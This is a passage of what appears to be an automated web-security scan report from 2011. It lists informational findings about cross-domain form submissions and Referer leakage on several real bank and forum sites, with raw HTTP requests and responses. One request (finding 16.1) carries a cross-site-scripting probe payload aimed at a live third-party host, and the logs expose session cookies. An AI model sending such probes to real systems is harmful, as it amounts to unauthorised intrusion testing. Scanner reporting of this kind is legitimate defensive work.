                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.39. http://www.invisionpower.com/suite/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /suite/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /suite/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=9aabf192bb30a4af0bbbb71ac1bc069e; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16659

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.40. http://www.invisionpower.com/suite/convert.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /suite/convert.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /suite/convert.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=425d20946eb97e193a2676dca8b4b19a; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 45468

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.41. http://www.invisionpower.com/suite/demo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /suite/demo.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /suite/demo.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=b3ba07c46c7f59c4c2530598f305678d; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14937

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.42. http://www.invisionpower.com/suite/iphone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /suite/iphone

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /suite/iphone HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=ca58823920e2a29ae5d3e4417155f495; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16912

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.43. http://www.invisionpower.com/suite/license_benefits.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /suite/license_benefits.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /suite/license_benefits.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=fcd2bc5c80f831364d3265d36ad7983e; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14587

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.44. http://www.invisionpower.com/suite/requirements.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /suite/requirements.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /suite/requirements.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=b8e183d5a4b68398e940475297b91125; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15393

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.45. https://www.pnc.com/webapp/unsec/Blank.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Blank.do

Issue detail

The page contains a form which POSTs data to the domain partners.leadfusion.com. The form contains the following fields:

Request

GET /webapp/unsec/Blank.do?siteArea=/pnccorp/PNC/Home/Personal/Loans/LandingPages/CHELOC+Home+Improvement&WT.mc_id=LOAN10_PNCWeb_0001&WT.ac=CHELOC_0810_P_LN HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:05 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9CbGFuay5kbw..
Keep-Alive: timeout=60, max=295
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 62518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
</h5>
               <form method="post" target="_blank" action="http://partners.leadfusion.com/tools/pncbank/creditline01/tool.fcs" id="LF_CHELOC">
                   <!--- The value below directs this calculator to the results screen. If you would like to direct user to the inputs screen, remove this hidden input --->
...[SNIP]...

15.46. https://www.wachovia.com/helpcenter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /helpcenter

Issue detail

The page contains a form which POSTs data to the domain www.wellsfargo.com. The form contains the following fields:

Request

GET /helpcenter HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:29:00 GMT
Server: IBM_HTTP_Server
Content-Length: 15556
Set-Cookie: JSESSIONID=0000rhlS1N-pE73MIep9_A-cQnt:13k56ps4a; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=114
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</h2><form action="https://www.wellsfargo.com/locator/atm/search" method="post" name="searchForm"><input name="user" type="hidden" value="wb" />
...[SNIP]...

16. Cross-domain Referer leakage  previous  next
There are 160 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


16.1. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000002)%3C/script%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: arbor.custhelp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:38:55 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUbhsP%7EVo%7Et35hYPDvwexZ8rbgyo0TnlWgjMOO4vYPOwKnBNRmtxgofxdsakbzn%7Ez4sYsFSCfCGrWuOauuePj6debgmI0rfPBE4NPsQ33q15z3PmOCmuiWLbHXX7t4WFpx1V%7EY%7E37EgTef8kmT01IXTcS1fZ6YqA5ZJma503q4kAs_ZjPlDNOS%7E3%7E8hu4ehIyOHqERsomxbIbAyQk3V2JvagzCYwL505R_71w_YS4FYy_Ev_GD00DZAS4g5u5NcrfC9bjSGKguFnQTOcJd2IZDcayzGIcCIlz1KY3Vtwm1Mt9TIuoQmlWm77erC_jOZXufLvsQoHth5YW%7E9uL0VMTzAP7ROKSUx6fS; path=/; httponly
RNT-Time: D=120025 t=1296697135155146
RNT-Machine: 07
F5_do_compression: yes
Keep-Alive: timeout=15, max=47
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 27220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<span id="rn_NavigationTab2_home_20" class="rn_NavigationTab2 ">
<a class="" href="https://support01.arbornetworks.com/" target="_self">
<span class="menu">
...[SNIP]...
<p>
Software Downloads |
<a href="https://support01.arbornetworks.com/">View site...</a>
...[SNIP]...

16.2. http://citi.bridgetrack.com/a/s/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 21:59:55 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021659550183&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/
Date: Wed, 02 Feb 2011 21:59:54 GMT
Connection: close
Content-Length: 2698

var bt_ad_content285777=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
...[SNIP]...
ash"].description.replace(/\D*(\d+)\..*/,"$1"),10);}catch(e){}for(var i=fmav;i>=0;i--){try{if(new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+i)){return i;}}catch(e){}}return 0;}if(fc()>=fmnv){h+=('<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=3,0,0,0" ID=FLASH_AD WIDTH=688 HEIGHT=153>' );h+=('<PARAM NAME=movie VALUE="'+btf+'">
...[SNIP]...

16.3. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?app=forums&module=extras&section=stats&do=leaders HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:45 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f787cf608e85462277c1a77192ccb730; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 60620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<td>
                   <img src='http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs720.ash1/161672_516237797_6814474_q.jpg' alt='photo' class='photo' width='25' height='25' />
               </td>
...[SNIP]...
<td>
                   <img src='http://a1.twimg.com/profile_images/432240524/twitterProfilePhoto_normal.jpg' alt='photo' class='photo' width='25' height='25' />
               </td>
...[SNIP]...
<td>
                   <img src='http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs343.snc4/41413_517185661_9280_q.jpg' alt='photo' class='photo' width='25' height='25' />
               </td>
...[SNIP]...
<td>
                   <img src='http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs716.ash1/161352_560415029_1440191_q.jpg' alt='photo' class='photo' width='25' height='25' />
               </td>
...[SNIP]...

16.4. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.php?s=757045b851650fbe10c53dad4062548d& HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:59:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=26478675dcab0f65937c75ece113f938; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:59:08 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/user/157503-therevtastic/' title='View Profile'><img src='http://a2.twimg.com/profile_images/1218668286/lmaosteve_normal.png' width='25' height='25' alt="TheRevTastic's Photo" class='photo' /></a>
...[SNIP]...

16.5. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?app=members&module=online&sort_key=name&sort_order=asc&show_mem=reg HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:57:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=efecbf0ab67a8c195202f74a3dbda1fc; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:57:02 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 56341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<td class='row1'>
                   <img src='http://a3.twimg.com/profile_images/357754763/cross_normal.gif' alt=".Ian's Photo" width='50' height='50' class='photo' />
               </td>
...[SNIP]...
<td class='row1'>
                   <img src='http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1281.snc4/173261_570812443_4547931_q.jpg' alt=".ScottM's Photo" width='50' height='50' class='photo' />
               </td>
...[SNIP]...
<td class='row1'>
                   <img src='http://a1.twimg.com/profile_images/432240524/twitterProfilePhoto_normal.jpg' alt="Alex Duggan's Photo" width='50' height='50' class='photo' />
               </td>
...[SNIP]...
<td class='row1'>
                   <img src='http://a3.twimg.com/profile_images/1151722910/ikusa_normal.jpg' alt="boboss78's Photo" width='50' height='50' class='photo' />
               </td>
...[SNIP]...

16.6. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?app=blog&show_members_blogs=61416 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:14:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=02e8588d1eb517e9dc3656908b0e6da6; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:14:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 52971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
